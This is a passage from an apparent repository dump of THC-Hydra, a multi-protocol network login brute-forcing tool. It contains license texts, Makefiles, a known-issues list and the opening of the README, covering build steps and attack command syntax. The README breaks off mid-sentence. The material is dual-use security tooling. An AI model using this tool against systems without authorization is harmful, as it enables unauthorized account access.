reasonable means, this is the first time you have\nreceived notice of violation of this License (for any work) from that\ncopyright holder, and you cure the violation prior to 30 days after\nyour receipt of the notice.\n\n Termination of your rights under this section does not terminate the\nlicenses of parties who have received copies or rights from you under\nthis License. If your rights have been terminated and not permanently\nreinstated, you do not qualify to receive new licenses for the same\nmaterial under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\n You are not required to accept this License in order to receive or\nrun a copy of the Program. Ancillary propagation of a covered work\noccurring solely as a consequence of using peer-to-peer transmission\nto receive a copy likewise does not require acceptance. However,\nnothing other than this License grants you permission to propagate or\nmodify any covered work. These actions infringe copyright if you do\nnot accept this License. Therefore, by modifying or propagating a\ncovered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\n Each time you convey a covered work, the recipient automatically\nreceives a license from the original licensors, to run, modify and\npropagate that work, subject to this License. You are not responsible\nfor enforcing compliance by third parties with this License.\n\n An \"entity transaction\" is a transaction transferring control of an\norganization, or substantially all assets of one, or subdividing an\norganization, or merging organizations. If propagation of a covered\nwork results from an entity transaction, each party to that\ntransaction who receives a copy of the work also receives whatever\nlicenses to the work the party's predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the\nCorresponding Source of the work from the predecessor in interest, if\nthe predecessor has it or can get it with reasonable efforts.\n\n You may not impose any further restrictions on the exercise of the\nrights granted or affirmed under this License. For example, you may\nnot impose a license fee, royalty, or other charge for exercise of\nrights granted under this License, and you may not initiate litigation\n(including a cross-claim or counterclaim in a lawsuit) alleging that\nany patent claim is infringed by making, using, selling, offering for\nsale, or importing the Program or any portion of it.\n\n 11. Patents.\n\n A \"contributor\" is a copyright holder who authorizes use under this\nLicense of the Program or a work on which the Program is based. The\nwork thus licensed is called the contributor's \"contributor version\".\n\n A contributor's \"essential patent claims\" are all patent claims\nowned or controlled by the contributor, whether already acquired or\nhereafter acquired, that would be infringed by some manner, permitted\nby this License, of making, using, or selling its contributor version,\nbut do not include claims that would be infringed only as a\nconsequence of further modification of the contributor version. For\npurposes of this definition, \"control\" includes the right to grant\npatent sublicenses in a manner consistent with the requirements of\nthis License.\n\n Each contributor grants you a non-exclusive, worldwide, royalty-free\npatent license under the contributor's essential patent claims, to\nmake, use, sell, offer for sale, import and otherwise run, modify and\npropagate the contents of its contributor version.\n\n In the following three paragraphs, a \"patent license\" is any express\nagreement or commitment, however denominated, not to enforce a patent\n(such as an express permission to practice a patent or covenant not to\nsue for patent infringement). To \"grant\" such a patent license to a\nparty means to make such an agreement or commitment not to enforce a\npatent against the party.\n\n If you convey a covered work, knowingly relying on a patent license,\nand the Corresponding Source of the work is not available for anyone\nto copy, free of charge and under the terms of this License, through a\npublicly available network server or other readily accessible means,\nthen you must either (1) cause the Corresponding Source to be so\navailable, or (2) arrange to deprive yourself of the benefit of the\npatent license for this particular work, or (3) arrange, in a manner\nconsistent with the requirements of this License, to extend the patent\nlicense to downstream recipients. \"Knowingly relying\" means you have\nactual knowledge that, but for the patent license, your conveying the\ncovered work in a country, or your recipient's use of the covered work\nin a country, would infringe one or more identifiable patents in that\ncountry that you have reason to believe are valid.\n\n If, pursuant to or in connection with a single transaction or\narrangement, you convey, or propagate by procuring conveyance of, a\ncovered work, and grant a patent license to some of the parties\nreceiving the covered work authorizing them to use, propagate, modify\nor convey a specific copy of the covered work, then the patent license\nyou grant is automatically extended to all recipients of the covered\nwork and works based on it.\n\n A patent license is \"discriminatory\" if it does not include within\nthe scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are\nspecifically granted under this License. You may not convey a covered\nwork if you are a party to an arrangement with a third party that is\nin the business of distributing software, under which you make payment\nto the third party based on the extent of your activity of conveying\nthe work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory\npatent license (a) in connection with copies of the covered work\nconveyed by you (or copies made from those copies), or (b) primarily\nfor and in connection with specific products or compilations that\ncontain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\n\n Nothing in this License shall be construed as excluding or limiting\nany implied license or other defenses to infringement that may\notherwise be available to you under applicable patent law.\n\n 12. No Surrender of Others' Freedom.\n\n If conditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot convey a\ncovered work so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you may\nnot convey it at all. For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey\nthe Program, the only way you could satisfy both those terms and this\nLicense would be to refrain entirely from conveying the Program.\n\n 13. Remote Network Interaction; Use with the GNU General Public License.\n\n Notwithstanding any other provision of this License, if you modify the\nProgram, your modified version must prominently offer all users\ninteracting with it remotely through a computer network (if your version\nsupports such interaction) an opportunity to receive the Corresponding\nSource of your version by providing access to the Corresponding Source\nfrom a network server at no charge, through some standard or customary\nmeans of facilitating copying of software. This Corresponding Source\nshall include the Corresponding Source for any work covered by version 3\nof the GNU General Public License that is incorporated pursuant to the\nfollowing paragraph.\n\n Notwithstanding any other provision of this License, you have\npermission to link or combine any covered work with a work licensed\nunder version 3 of the GNU General Public License into a single\ncombined work, and to convey the resulting work. The terms of this\nLicense will continue to apply to the part which is the covered work,\nbut the work with which it is combined will remain governed by version\n3 of the GNU General Public License.\n\n 14. Revised Versions of this License.\n\n The Free Software Foundation may publish revised and/or new versions of\nthe GNU Affero General Public License from time to time. Such new versions\nwill be similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\n Each version is given a distinguishing version number. If the\nProgram specifies that a certain numbered version of the GNU Affero General\nPublic License \"or any later version\" applies to it, you have the\noption of following the terms and conditions either of that numbered\nversion or of any later version published by the Free Software\nFoundation. If the Program does not specify a version number of the\nGNU Affero General Public License, you may choose any version ever published\nby the Free Software Foundation.\n\n If the Program specifies that a proxy can decide which future\nversions of the GNU Affero General Public License can be used, that proxy's\npublic statement of acceptance of a version permanently authorizes you\nto choose that version for the Program.\n\n Later license versions may give you additional or different\npermissions. However, no additional obligations are imposed on any\nauthor or copyright holder as a result of your choosing to follow a\nlater version.\n\n 15. Disclaimer of Warranty.\n\n THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM\nIS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF\nALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n 16. Limitation of Liability.\n\n IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF\nDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD\nPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\n If the disclaimer of warranty and limitation of liability provided\nabove cannot be given local legal effect according to their terms,\nreviewing courts shall apply local law that most closely approximates\nan absolute waiver of all civil liability in connection with the\nProgram, unless a warranty or assumption of liability accompanies a\ncopy of the Program in return for a fee.\n\n END OF TERMS AND CONDITIONS\n\n How to Apply These Terms to Your New Programs\n\n If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n To do so, attach the following notices to the program. It is safest\nto attach them to the start of each source file to most effectively\nstate the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n \n Copyright (C) \n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU Affero General Public License as published\n by the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU Affero General Public License for more details.\n\n You should have received a copy of the GNU Affero General Public License\n along with this program. If not, see .\n\nAlso add information on how to contact you by electronic and paper mail.\n\n If your software can interact with users remotely through a computer\nnetwork, you should also make sure that it provides a way for users to\nget its source. For example, if your program is a web application, its\ninterface could display a \"Source\" link that leads users to an archive\nof the code. There are many ways you could offer source, and different\nsolutions will be better for different programs; see section 13 for the\nspecific requirements.\n\n You should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary.\nFor more information on this, and how to apply and follow the GNU AGPL, see\n.\n" }, { "path": "LICENSE_OPENSSL", "content": "/* \n * (c) 2002, 2003, 2004 by Jason McLaughlin and Riadh Elloumi\n *\n * This program is free software; you can redistribute it and/or\n * modify it under the terms of the GNU General Public License as\n * published by the Free Software Foundation; either version 2 of the\n * License, or (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful, but\n * is provided AS IS, WITHOUT ANY WARRANTY; without even the implied\n * warranty of MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, and\n * NON-INFRINGEMENT. See the GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program; if not, write to the Free Software\n * Foundation, Inc.\n *\n * Free Software Foundation\n * 51 Franklin Street, Fifth Floor\n * Boston, MA 02110-1335\n * USA\n *\n * Telephone: +1-617-542-5942\n * Fax: +1-617-542-2652\n * General email: info@fsf.org\n *\n * In addition, as a special exception, the copyright holders give\n * permission to link the code of portions of this program with the\n * OpenSSL library under certain conditions as described in each\n * individual source file, and distribute linked combinations\n * including the two.\n * You must obey the GNU General Public License in all respects\n * for all of the code used other than OpenSSL. If you modify\n * file(s) with this exception, you may extend this exception to your\n * version of the file(s), but you are not obligated to do so. If you\n * do not wish to do so, delete this exception statement from your\n * version. If you delete this exception statement from all source\n * files in the program, then also delete it here.\n */\n\nCertain source files in this program permit linking with the OpenSSL\nlibrary (http://www.openssl.org), which otherwise wouldn't be allowed\nunder the GPL. For purposes of identifying OpenSSL, most source files\ngiving this permission limit it to versions of OpenSSL having a license\nidentical to that listed in this file (LICENSE.OpenSSL). It is not\nnecessary for the copyright years to match between this file and the\nOpenSSL version in question. However, note that because this file is\nan extension of the license statements of these source files, this file\nmay not be changed except with permission from all copyright holders\nof source files in this program which reference this file.\n\n\n LICENSE ISSUES\n ==============\n\n The OpenSSL toolkit stays under a dual license, i.e. both the conditions of\n the OpenSSL License and the original SSLeay license apply to the toolkit.\n See below for the actual license texts. Actually both licenses are BSD-style\n Open Source licenses. In case of any license issues related to OpenSSL\n please contact openssl-core@openssl.org.\n\n OpenSSL License\n ---------------\n\n/* ====================================================================\n * Copyright (c) 1998-2001 The OpenSSL Project. All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer. \n *\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in\n * the documentation and/or other materials provided with the\n * distribution.\n *\n * 3. All advertising materials mentioning features or use of this\n * software must display the following acknowledgment:\n * \"This product includes software developed by the OpenSSL Project\n * for use in the OpenSSL Toolkit. (http://www.openssl.org/)\"\n *\n * 4. The names \"OpenSSL Toolkit\" and \"OpenSSL Project\" must not be used to\n * endorse or promote products derived from this software without\n * prior written permission. For written permission, please contact\n * openssl-core@openssl.org.\n *\n * 5. Products derived from this software may not be called \"OpenSSL\"\n * nor may \"OpenSSL\" appear in their names without prior written\n * permission of the OpenSSL Project.\n *\n * 6. Redistributions of any form whatsoever must retain the following\n * acknowledgment:\n * \"This product includes software developed by the OpenSSL Project\n * for use in the OpenSSL Toolkit (http://www.openssl.org/)\"\n *\n * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY\n * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR\n * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT\n * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,\n * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED\n * OF THE POSSIBILITY OF SUCH DAMAGE.\n * ====================================================================\n *\n * This product includes cryptographic software written by Eric Young\n * (eay@cryptsoft.com). This product includes software written by Tim\n * Hudson (tjh@cryptsoft.com).\n *\n */\n\n Original SSLeay License\n -----------------------\n\n/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)\n * All rights reserved.\n *\n * This package is an SSL implementation written\n * by Eric Young (eay@cryptsoft.com).\n * The implementation was written so as to conform with Netscapes SSL.\n * \n * This library is free for commercial and non-commercial use as long as\n * the following conditions are aheared to. The following conditions\n * apply to all code found in this distribution, be it the RC4, RSA,\n * lhash, DES, etc., code; not just the SSL code. The SSL documentation\n * included with this distribution is covered by the same copyright terms\n * except that the holder is Tim Hudson (tjh@cryptsoft.com).\n * \n * Copyright remains Eric Young's, and as such any Copyright notices in\n * the code are not to be removed.\n * If this package is used in a product, Eric Young should be given attribution\n * as the author of the parts of the library used.\n * This can be in the form of a textual message at program startup or\n * in documentation (online or textual) provided with the package.\n * \n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. All advertising materials mentioning features or use of this software\n * must display the following acknowledgement:\n * \"This product includes cryptographic software written by\n * Eric Young (eay@cryptsoft.com)\"\n * The word 'cryptographic' can be left out if the rouines from the library\n * being used are not cryptographic related :-).\n * 4. If you include any Windows specific code (or a derivative thereof) from \n * the apps directory (application code) you must include an acknowledgement:\n * \"This product includes software written by Tim Hudson (tjh@cryptsoft.com)\"\n * \n * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n * \n * The licence and distribution terms for any publically available version or\n * derivative of this code cannot be changed. i.e. this code cannot simply be\n * copied and put under another distribution licence\n * [including the GNU Public Licence.]\n */\n\n" }, { "path": "Makefile.am", "content": "#\n# Makefile for Hydra - (c) 2001-2023 by van Hauser / THC \n#\nWARN_CLANG=-Wformat-nonliteral -Wstrncat-size -Wformat-security -Wsign-conversion -Wconversion -Wfloat-conversion -Wshorten-64-to-32 -Wuninitialized -Wmissing-variable-declarations -Wmissing-declarations\nWARN_GCC=-Wformat=2 -Wformat-overflow=2 -Wformat-nonliteral -Wformat-truncation=2 -Wnull-dereference -Wstrict-overflow=2 -Wstringop-overflow=4 -Walloca-larger-than=4096 -Wtype-limits -Wconversion -Wtrampolines -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -fno-common -Wcast-align\nCFLAGS ?= -g\nOPTS=-I. -O3 $(CFLAGS) -fcommon -Wno-deprecated-declarations\nCPPFLAGS += -D_GNU_SOURCE -Wno-deprecated-declarations -Wno-pointer-sign -Wno-format-truncation -Wno-format-overflow\n# -Wall -g -pedantic\nLIBS=-lm\nDESTDIR ?=\nBINDIR = /bin\nMANDIR = /man/man1/\nDATADIR = /etc\nPIXDIR = /share/pixmaps\nAPPDIR = /share/applications\n\nSRC = hydra-vnc.c hydra-pcnfs.c hydra-rexec.c hydra-nntp.c hydra-socks5.c \\\n hydra-telnet.c hydra-cisco.c hydra-http.c hydra-ftp.c hydra-imap.c \\\n hydra-pop3.c hydra-smb.c hydra-icq.c hydra-cisco-enable.c hydra-ldap.c \\\n hydra-memcached.c hydra-mongodb.c hydra-mysql.c hydra-mssql.c hydra-xmpp.c \\\n hydra-http-proxy-urlenum.c hydra-snmp.c hydra-cvs.c hydra-smtp.c \\\n hydra-smtp-enum.c hydra-sapr3.c hydra-ssh.c hydra-sshkey.c hydra-teamspeak.c \\\n hydra-postgres.c hydra-rsh.c hydra-rlogin.c hydra-oracle-listener.c \\\n hydra-svn.c hydra-pcanywhere.c hydra-sip.c hydra-oracle.c hydra-vmauthd.c \\\n hydra-asterisk.c hydra-firebird.c hydra-afp.c hydra-ncp.c hydra-rdp.c \\\n hydra-oracle-sid.c hydra-http-proxy.c hydra-http-form.c hydra-irc.c \\\n hydra-s7-300.c hydra-redis.c hydra-adam6500.c hydra-rtsp.c \\\n hydra-rpcap.c hydra-radmin2.c hydra-cobaltstrike.c \\\n hydra-time.c crc32.c d3des.c bfg.c ntlm.c sasl.c hmacmd5.c hydra-mod.c \\\n hydra-smb2.c\nOBJ = hydra-vnc.o hydra-pcnfs.o hydra-rexec.o hydra-nntp.o hydra-socks5.o \\\n hydra-telnet.o hydra-cisco.o hydra-http.o hydra-ftp.o hydra-imap.o \\\n hydra-pop3.o hydra-smb.o hydra-icq.o hydra-cisco-enable.o hydra-ldap.o \\\n hydra-memcached.o hydra-mongodb.o hydra-mysql.o hydra-mssql.o hydra-cobaltstrike.o hydra-xmpp.o \\\n hydra-http-proxy-urlenum.o hydra-snmp.o hydra-cvs.o hydra-smtp.o \\\n hydra-smtp-enum.o hydra-sapr3.o hydra-ssh.o hydra-sshkey.o hydra-teamspeak.o \\\n hydra-postgres.o hydra-rsh.o hydra-rlogin.o hydra-oracle-listener.o \\\n hydra-svn.o hydra-pcanywhere.o hydra-sip.o hydra-oracle-sid.o hydra-oracle.o \\\n hydra-vmauthd.o hydra-asterisk.o hydra-firebird.o hydra-afp.o \\\n hydra-ncp.o hydra-http-proxy.o hydra-http-form.o hydra-irc.o \\\n hydra-redis.o hydra-rdp.o hydra-s7-300.c hydra-adam6500.o hydra-rtsp.o \\\n hydra-rpcap.o hydra-radmin2.o \\\n crc32.o d3des.o bfg.o ntlm.o sasl.o hmacmd5.o hydra-mod.o hydra-time.o \\\n hydra-smb2.o\nBINS = hydra pw-inspector\n\nEXTRA_DIST = README README.arm README.palm CHANGES TODO INSTALL LICENSE \\\n hydra-mod.h hydra.h crc32.h d3des.h\n\nall:\tpw-inspector hydra $(XHYDRA_SUPPORT) \n\t@echo\n\t@echo Now type \"make install\"\n\nhydra:\thydra.c $(OBJ)\n\t$(CC) $(OPTS) $(SEC) $(LDSEC) $(LIBS) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o hydra $(HYDRA_LOGO) hydra.c $(OBJ) $(LIBS) $(XLIBS) $(XLIBPATHS) $(XIPATHS) $(XDEFINES)\n\t@echo\n\t@echo If men could get pregnant, abortion would be a sacrament\n\t@echo\n\nxhydra:\t\n\t-cd hydra-gtk && sh ./make_xhydra.sh\n\npw-inspector: pw-inspector.c\n\t$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) $(LDFLAGS) -o pw-inspector $(PWI_LOGO) pw-inspector.c\n\n.c.o:\t\n\t$(CC) $(OPTS) $(SEC) $(CFLAGS) $(CPPFLAGS) -c $< $(XDEFINES) $(XIPATHS)\n\nstrip:\tall\n\t-strip $(BINS)\n\t-echo OK > /dev/null && test -x xhydra && strip xhydra || echo OK > /dev/null\n\ninstall:\tstrip\n\t-mkdir -p $(DESTDIR)$(PREFIX)$(BINDIR)\n\tcp -f hydra-wizard.sh $(BINS) $(DESTDIR)$(PREFIX)$(BINDIR) && cd $(DESTDIR)$(PREFIX)$(BINDIR) && chmod 755 hydra-wizard.sh $(BINS)\n\t-echo OK > /dev/null && test -x xhydra && cp xhydra $(DESTDIR)$(PREFIX)$(BINDIR) && cd $(DESTDIR)$(PREFIX)$(BINDIR) && chmod 755 xhydra || echo OK > /dev/null\n\t-sed -e \"s|^INSTALLDIR=.*|INSTALLDIR=\"$(PREFIX)\"|\" dpl4hydra.sh | sed -e \"s|^LOCATION=.*|LOCATION=\"$(DATADIR)\"|\" > $(DESTDIR)$(PREFIX)$(BINDIR)/dpl4hydra.sh\n\t-chmod 755 $(DESTDIR)$(PREFIX)$(BINDIR)/dpl4hydra.sh\n\t-mkdir -p $(DESTDIR)$(PREFIX)$(DATADIR)\n\t-cp -f *.csv $(DESTDIR)$(PREFIX)$(DATADIR)\n\t-mkdir -p $(DESTDIR)$(PREFIX)$(MANDIR)\n\t-cp -f hydra.1 xhydra.1 pw-inspector.1 $(DESTDIR)$(PREFIX)$(MANDIR)\n\t-mkdir -p $(DESTDIR)$(PREFIX)$(PIXDIR)\n\t-cp -f xhydra.png $(DESTDIR)$(PREFIX)$(PIXDIR)/\n\t-mkdir -p $(DESTDIR)$(PREFIX)$(APPDIR)\n\t-desktop-file-install --dir $(DESTDIR)$(PREFIX)$(APPDIR) xhydra.desktop\n\nclean:\n\trm -rf xhydra pw-inspector hydra *.o core *.core *.stackdump *~ Makefile.in Makefile dev_rfc hydra.restore arm/*.ipk arm/ipkg/usr/bin/* hydra-gtk/src/*.o hydra-gtk/src/xhydra hydra-gtk/stamp-h hydra-gtk/config.status hydra-gtk/errors hydra-gtk/config.log hydra-gtk/src/.deps hydra-gtk/src/Makefile hydra-gtk/Makefile\n\tcp -f Makefile.orig Makefile\n\nuninstall:\n\t-rm -f $(DESTDIR)$(PREFIX)$(BINDIR)/xhydra $(DESTDIR)$(PREFIX)$(BINDIR)/hydra $(DESTDIR)$(PREFIX)$(BINDIR)/pw-inspector $(DESTDIR)$(PREFIX)$(BINDIR)/hydra-wizard.sh $(DESTDIR)$(PREFIX)$(BINDIR)/dpl4hydra.sh\n\t-rm -f $(DESTDIR)$(PREFIX)$(DATADIR)/dpl4hydra_full.csv $(DESTDIR)$(PREFIX)$(DATADIR)/dpl4hydra_local.csv\n\t-rm -f $(DESTDIR)$(PREFIX)$(MANDIR)/hydra.1 $(DESTDIR)$(PREFIX)$(MANDIR)/xhydra.1 $(DESTDIR)$(PREFIX)$(MANDIR)/pw-inspector.1\n\t-rm -f $(DESTDIR)$(PREFIX)$(PIXDIR)/xhydra.png\n\t-rm -f $(DESTDIR)$(PREFIX)$(APPDIR)/xhydra.desktop\n" }, { "path": "Makefile.orig", "content": "all:\n\t@echo Error: you must run \"./configure\" first\n\nclean:\n\tcp -f Makefile.orig Makefile\n\nuninstall:\n\t@echo Error: you must run \"./configure\" first\n" }, { "path": "Makefile.unix", "content": "STRIP=strip\n" }, { "path": "PROBLEMS", "content": "List of known issues:\n=====================\n\n* Cygwin: more than 30 tasks (-t 31 or more) will lead to a stack smash\n* OS X: brew installed modules are not compiled correctly and will crash hydra\n" }, { "path": "README", "content": "\n\t\t\t\t H Y D R A\n\n (c) 2001-2023 by van Hauser / THC\n https://github.com/vanhauser-thc/thc-hydra\n Many modules were written by David (dot) Maciejak @ gmail (dot) com\n BFG code by Jan Dlabal \n\n \t\t Licensed under AGPLv3 (see LICENSE file)\n\n Please do not use in military or secret service organizations,\n or for illegal purposes.\n (This is the wish of the author and non-binding. Many people working\n in these organizations do not care for laws and ethics anyway.\n You are not one of the \"good\" ones if you ignore this.)\n\n NOTE: No, this is not meant to be a markdown doc! old school!\n\n\nHydra in the most current GitHub state can be directly downloaded via Docker:\n```\ndocker pull vanhauser/hydra\n```\n\n\nINTRODUCTION\n------------\nNumber one of the biggest security holes are passwords, as every password\nsecurity study shows.\nThis tool is a proof-of-concept code to give researchers and security\nconsultants the possibility of showing how easy it would be to gain unauthorized\naccess from a remote to a system.\n\nTHIS TOOL IS FOR LEGAL PURPOSES ONLY!\n\nThere are already several login hacker tools available; however, none of them\nsupport more than one protocol to attack or support parallelized\nconnects.\n\nIt was tested to compile cleanly on Linux, Windows/Cygwin, Solaris,\nFreeBSD/OpenBSD, QNX (Blackberry 10), and MacOS.\n\nCurrently, this tool supports the following protocols:\n Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP,\n HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY,\n HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST,\n HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MEMCACHED, MONGODB, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener,\n Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, Radmin, RDP, Rexec, Rlogin,\n Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5,\n SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth,\n VNC and XMPP.\n\nHowever, the module engine for new services is very easy, so it won't take a\nlong time until even more services are supported.\nYour help in writing, enhancing, or fixing modules is highly appreciated!! :-)\n\n\n\nWHERE TO GET\n------------\nYou can always find the newest release/production version of Hydra at its\nproject page at https://github.com/vanhauser-thc/thc-hydra/releases\nIf you are interested in the current development state, the public development\nrepository is on GitHub:\n svn co https://github.com/vanhauser-thc/thc-hydra\n or\n git clone https://github.com/vanhauser-thc/thc-hydra\nUse the development version at your own risk. It contains new features and\nnew bugs. Things might not work!\n\nAlternatively (and easier), you can pull it as a Docker container:\n```\ndocker pull vanhauser/hydra\n```\n\n\nHOW TO COMPILE\n--------------\nTo configure, compile, and install Hydra, just type:\n\n```\n./configure\nmake\nmake install\n```\n\nIf you want the SSH module, you have to set up libssh (not libssh2!) on your\nsystem, get it from https://www.libssh.org, for ssh v1 support you also need\nto add the \"-DWITH_SSH1=On\" option in the cmake command line.\nIMPORTANT: If you compile on macOS, you must do this - do not install libssh via Homebrew.\n\nIf you use Ubuntu/Debian, this will install the supplementary libraries needed\nfor a few optional modules (note that some might not be available on your distribution):\n\n```\napt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \\\n libgtk-3-dev libmysqlclient-dev libpq-dev libsvn-dev \\\n firebird-dev libmemcached-dev libgpg-error-dev \\\n libgcrypt11-dev libgcrypt20-dev freetds-dev\n```\n\nThis enables all optional modules and features except for Oracle,\nSAP R/3, NCP, and the Apple filing protocol - which you will need to download and\ninstall from the vendor's websites.\n\nFor all other Linux derivatives and BSD-based systems, use the system\nsoftware installer and look for similarly named libraries, like in the\ncommand above. In all other cases, you have to download all source libraries\nand compile them manually.\n\n\n\nSUPPORTED PLATFORMS\n-------------------\n- All UNIX platforms (Linux, *BSD, Solaris, etc.)\n- MacOS (basically a BSD clone)\n- Windows with Cygwin (both IPv4 and IPv6)\n- Mobile systems based on Linux, MacOS, or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)\n\n\n\nHOW TO USE\n----------\nIf you just enter `hydra`, you will see a short summary of the important\noptions available.\nType `./hydra -h` to see all available command line options.\n\nNote that NO login/password file is included. Generate them yourself.\nA default password list is, however, present; use \"dpl4hydra.sh\" to generate\na list.\n\nFor Linux users, a GTK GUI is available; try `./xhydra`\n\nFor the command line usage, the syntax is as follows:\n For attacking one target or a network, you can use the new \"://\" style:\n hydra [some command line options] PROTOCOL://TARGET:PORT/MODULE-OPTIONS\n The old mode can be used for these, too, and additionally, if you want to\n specify your targets from a text file; you *must* use this one:\n\n```\nhydra [some command line options] [-s PORT] TARGET PROTOCOL [MODULE-OPTIONS]\n```\n\nVia the command line options, you specify which logins to try, which passwords,\nif SSL should be used, how many parallel tasks should be used for attacking, etc.\n\nPROTOCOL is the protocol you want to use for attacking, e.g., ftp, SMTP,\nhttp-get or many others are available\nTARGET is the target you want to attack\nMODULE-OPTIONS are optional values that are special per PROTOCOL module\n\nFIRST - select your target\n You have three options on how to specify the target you want to attack:\n 